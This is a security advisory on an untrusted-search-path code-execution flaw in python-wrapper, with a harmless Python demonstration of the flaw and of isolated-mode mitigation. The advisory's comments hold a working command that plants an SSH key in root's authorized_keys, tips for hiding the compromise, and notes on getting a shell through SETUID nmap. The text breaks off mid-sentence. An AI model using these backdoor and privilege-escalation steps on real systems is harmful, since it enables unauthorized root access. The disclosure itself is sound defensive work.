wsgiserver python vulnerability_Python-wrapper Untrusted Search Path / Code Execution

This post discloses a security vulnerability in Python-wrapper that lets a non-privileged user craft a malicious `test.py` script and trick a user with root privileges into running the `help('modules')` command, thereby executing arbitrary code. An attacker can use this to plant a backdoor in the victim's environment, for example by modifying `/root/.ssh/authorized_keys`, and so escalate privileges. It also discusses how nmap can be used for a similar attack and gives an example attack scenario in a shared hosting environment.
Summary generated by CSDN using AI technology

# python-wrapper untrusted search path/code execution vulnerability
#
# Python-wrapper executes any test.py script in the current working directory when supplied with help('modules').
# A non-privileged user may gain code execution by tricking root into running help('modules'), or help() followed by
# `modules` at the help prompt, from within python-wrapper while in that non-privileged user's working directory.
# The interactive interpreter puts the current working directory first on sys.path; that is the untrusted search path,
# and a test.py placed there shadows the standard library's test package for any import of that name.
#
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command and then
# continuing normally, with no signs of compromise if you redirect the command's output.
# os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not work; however,
# os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
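To make the search-path point concrete, the following is an added demonstration, not code from the advisory or from the python-wrapper project. It plants a test.py in a scratch directory, starts a child interpreter there the way an interactive or `-c` session would, and shows that `import test` resolves to the planted file and runs it, which is the same cwd-first lookup that lets the advisory's help('modules') trigger reach test.py. Started with `-I` (isolated mode, Python 3.4+, which keeps the current directory off sys.path) the planted file is never consulted. The planted module body, the marker file and the PLANT_MARKER/PLANT_FILE environment variable names are constructed for the example.

```python
"""Untrusted search path demo: cwd-first module resolution vs. isolated mode.

Constructed example. The planted test.py below stands in for the advisory's
payload; it only records that it ran and then behaves like an empty module.
"""
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in for the attacker's test.py: leave a marker and then
# behave like an ordinary module so the importing program sees nothing odd.
PLANTED_TEST_PY = textwrap.dedent("""\
    import os
    with open(os.environ["PLANT_MARKER"], "a") as fh:
        fh.write("test.py imported from cwd\\n")
""")

# What the victim interpreter runs: import `test` and report which file won.
PROBE = textwrap.dedent("""\
    import os
    try:
        import test
    except ImportError:
        print("missing")
    else:
        found = os.path.realpath(getattr(test, "__file__", None) or "")
        planted = os.path.realpath(os.environ["PLANT_FILE"])
        print("planted" if found == planted else "elsewhere")
""")


def probe(isolated):
    """Run `import test` in a child interpreter whose cwd holds a planted test.py.

    Returns (resolution, marker_written):
      resolution      'planted'   the cwd file was imported (untrusted search path)
                      'elsewhere' some other test module/package won
                      'missing'   no module named test at all (some distros
                                  ship the stdlib test package separately)
      marker_written  True if the planted module's code actually executed
    """
    with tempfile.TemporaryDirectory() as cwd:
        planted_file = os.path.join(cwd, "test.py")
        with open(planted_file, "w") as fh:
            fh.write(PLANTED_TEST_PY)
        marker = os.path.join(cwd, "marker.txt")

        cmd = [sys.executable]
        if isolated:
            # -I drops the cwd/script dir from sys.path (3.4+); on 3.11+
            # -P does just that part without the rest of isolated mode.
            cmd.append("-I")
        cmd += ["-c", PROBE]

        env = dict(os.environ, PLANT_MARKER=marker, PLANT_FILE=planted_file)
        # Make sure the host environment is not already hardening the child.
        env.pop("PYTHONSAFEPATH", None)

        result = subprocess.run(cmd, cwd=cwd, env=env,
                                capture_output=True, text=True)
        resolution = result.stdout.strip() or "error"
        return resolution, os.path.exists(marker)


if __name__ == "__main__":
    print("default   :", probe(isolated=False))   # planted file wins and runs
    print("isolated  :", probe(isolated=True))    # planted file never touched
```

The interesting line is the child's `import test`: nothing in the probe names the current directory, yet with the default sys.path the planted file is both chosen and executed. Running the victim interpreter with `-I` (or `-P` on 3.11+) is the mitigation the demonstration points at; it changes only the search path, not the code being run.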

#
#
# Additionally, nmap makes a great backdoor from a non-privileged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really (and it will complain if invoked). In nmap 5.31DC1 the most useful switch (--interactive) was removed,
# which previously allowed you to bang out a shell (!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW, however, there is the nmap scripting engine to exploit. As usual, the input/output commands will behave like any exploitable SETUID program
# with input/output commands.
#
#
# A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting environment.
# After convincing root(support) to cd in t
